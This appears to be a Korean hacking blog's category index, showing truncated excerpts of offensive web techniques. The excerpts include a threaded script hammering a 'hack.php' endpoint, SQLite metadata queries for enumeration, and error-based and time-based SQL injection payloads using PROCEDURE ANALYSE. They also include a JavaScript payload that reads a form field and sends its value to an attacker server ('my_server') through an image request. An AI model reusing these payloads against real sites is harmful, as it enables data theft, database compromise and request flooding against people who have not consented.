HACK/WEB
-
-
Thread Requests ExampleHACK/WEB 2018. 11. 7. 11:06
[Thread Request] import requests import time from multiprocessing.dummy import Pool as ThreadPool try: requests.packages.urllib3.disable_warnings() except: pass def run(i): s = requests.session() print '[+] Start %d' % i for _ in xrange(5): URL = 'https://mysite.com/hack.php' s.get(url=URL, verify=False) pass def main(): ThreadCnt = 8 pool = ThreadPool( ThreadCnt ) result = pool.map_async( run, ..
-
SQLite 테이블, 컬럼 정보 가져오기HACK/WEB 2018. 8. 9. 13:59
sqlite_master Tablemysql 에서 테이블 정보나 컬럼 정보를 가져올때 information_schema 테이블을 많이 이용하는데 sqlite 에는 sqlite_master 테이블을 이용해서 테이블, 컬럼 정보를 가져온다. CREATE TABLE sqlite_master( type text, name text, tbl_name text, rootpage integer, sql text);테이블 정보 가져오기sqlite_master 에서 테이블 정보를 가져올때 name 또는 tbl_name 필드를 이용하면 된다.mysql => SELECT table_name FROM information_schema.tablessqlite => SELECT tbl_name FROM sqlite_master컬..
-
PROCEDURE ANALYSE - SQLiHACK/WEB 2018. 8. 3. 20:57
아래 Cheat Sheet 는 Input Vector 가 LIMIT 절 이후에 올 경우 유용하게 쓰입니다.Error based SQLiSELECT myColumn FROM myTable WHERE 1=1 LIMIT 0,1 PROCEDURE ANALYSE(extractvalue(rand(), concat(0x3A, version()), 1); Output: ERROR 1105 (HY000): XPATH syntax error: ':10.1.33-MariaDB' Time based SQLiSELECT myColumn FROM myTable WHERE 1=1 LIMIT 0,1 PROCEDURE ANALYSE(extractvalue(rand(), concat(0x3A, (IF(mid(version(), 1, 1..
-
JavaScript - CSRFHACK/WEB 2018. 7. 18. 21:16
CSRF(getElementsByName) window.onload=function(){m=[`http://my_server/`,document.getElementsByName(`my_name`)[0].value].join(``);(new Image).src=m;}; window.onload=function(){ m = [`http://my_server/`, document.getElementsByName(`my_name`)[0].value].join(``); (new Image).src=m; };